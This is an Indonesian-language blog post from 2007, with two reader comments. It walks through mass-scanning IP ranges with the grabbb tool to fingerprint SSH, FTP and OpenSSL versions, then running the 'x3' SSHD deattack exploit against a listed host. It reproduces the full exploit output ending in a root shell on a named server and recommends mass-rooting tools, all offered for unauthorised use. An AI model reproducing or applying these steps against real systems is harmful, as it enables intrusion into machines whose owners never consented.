Saturday, March 31, 2007

Root Attack

lebih lanjut...
1. download scanning http://xvak-1.150m.com/tool/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz dan make , maka akan kmu dapati file grabbb.
3. cara penggunaan grabbb :
a. ketik ./grabbb maka akan ada help nya
b. klo saya biasanya ./grabbb -a xxx.xxx.xxx.0 -b xxx.xxx.xxx.255 port <== port disini
terserah kmu mau berapa, bisa 21, 22, 23, 443, 80, 8080
- klo kita scan port 21 maka akan keliatan versi wuftpd
- klo kita scan port 22 maka akan keliatan versi ssh
- klo kita scan port 443 maka akan keliatan versi openssl

berikut contoh ssh:
66.1.198.210:22: SSH-1.99-OpenSSH_2.5.2p2
66.1.205.138:22: SSH-1.99-OpenSSH_2.9p2
66.1.213.59:22: SSH-1.5-1.2.27
66.1.214.123:22: SSH-1.99-OpenSSH_2.9p2
66.1.217.77:22: SSH-1.5-1.2.25

setelah kita tau ssh yang dipake, tinggal menjalankan exploitnya

4. download x2, x3, x4 dst tergantung kmu mau pake yang mana, pake semua juga bisa
sebagai contoh pemakaian saya pake x3.tar.gz
5. ./x3 -t 0
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Targets:
( 1) Small - SSH-1.5-1.2.26
( 2) Small - SSH-1.5-OpenSSH-1.2.3
( 3) Small - SSH-1.5-1.2.31
( 4) Small - SSH-1.5-1.3.07
( 5) Small - SSH-1.99-OpenSSH_2.1.1
( 6) Small - SSH-1.5-1.3.6_F-SECURE_SSH
( 7) Small - SSH-1.5-1.2.27
( 8) Small - SSH-1.99-OpenSSH_2.2.0p1
( 9) Big - SSH-1.99-OpenSSH_2.2.0p1
(10) Big - SSH-1.5-1.2.27
(11) Small - SSH-1.99-OpenSSH_2.2.0p1 -TEST
(12) Big - SSH-1.5-1.2.27

6. klo kita liat hasil dari grabbb, maka kita mendapat satu ip yaitu
66.1.213.59:22: SSH-1.5-1.2.27

7. kita coba ./x3 -t 7 66.1.213.59 22 .
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)

Target: Small - SSH-1.99-OpenSSH_2.2.0p1

Attacking: 66.1.213.59:22
Testing if remote sshd is vulnerable # ATTACH NOW

YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SURVIVED #
(7 ) binary-search: h: 0x083faffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fabfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fadfc, slider: 0x00000200 # SEGV #
(10) binary-search: h: 0x083facfc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fac7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083facbc, slider: 0x00000040 # SURVIVED #
(13) binary-search: h: 0x083facdc, slider: 0x00000020 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083facdc # SURVIVED #
Exact match found at: 0x00005324
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080c5324 # SEGV #
(18) Trying: 0x080c6324 # SEGV #
(19) Trying: 0x080c7324 # SEGV #
(20) Trying: 0x080c8324 # SEGV #
(21) Trying: 0x0810e324 # SURVIVED #
(22 Trying: 0x08088634 # OK #
Finding distance till stack buffer

Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807
Crash, finding next return address
EX: buf: 0x0807420c h: 0x0806f000 ret-dist: 0xb7f8ba02
ATTACH NOW
Changing MSW of return address to: 0x0807


********* YOU ARE IN *********

uname -a ; id
uname -a ; id
Linux chander.com.tw 2.4.18-3 #1 Thu Apr 18 07:31:07 EDT 2002 i586 unknown
uid=48(root) gid=48(root) groups=48(root)

nah itu uah dapat, terserah mau diapakan

keterangan:
ngeroot menggunakan exploit ini sangatlah memakan waktu, saya menyarankan utk memakai scan massal, bisa memakai massplo.tar.gz atau massrooter.tar.gz sama saja.

tapi yang terpenting disini kita tau bagaimana cara mencari dia memakai ssh versi berapa, wuftp versi berapa, dan yang lain-lain

2 comments:

Smart of The spirits said...

haduuu kakak....
cara n penejelasannya rumit kalo di blog.!!
kakak punya YM gag..??
klo punya saya mau share langsung ke YM kakak n agar dapat lebih jelas.
boleh kan kak.??

pendidikan.tk said...

ini OSnya pakai apaan??
windows
BT
LINUX?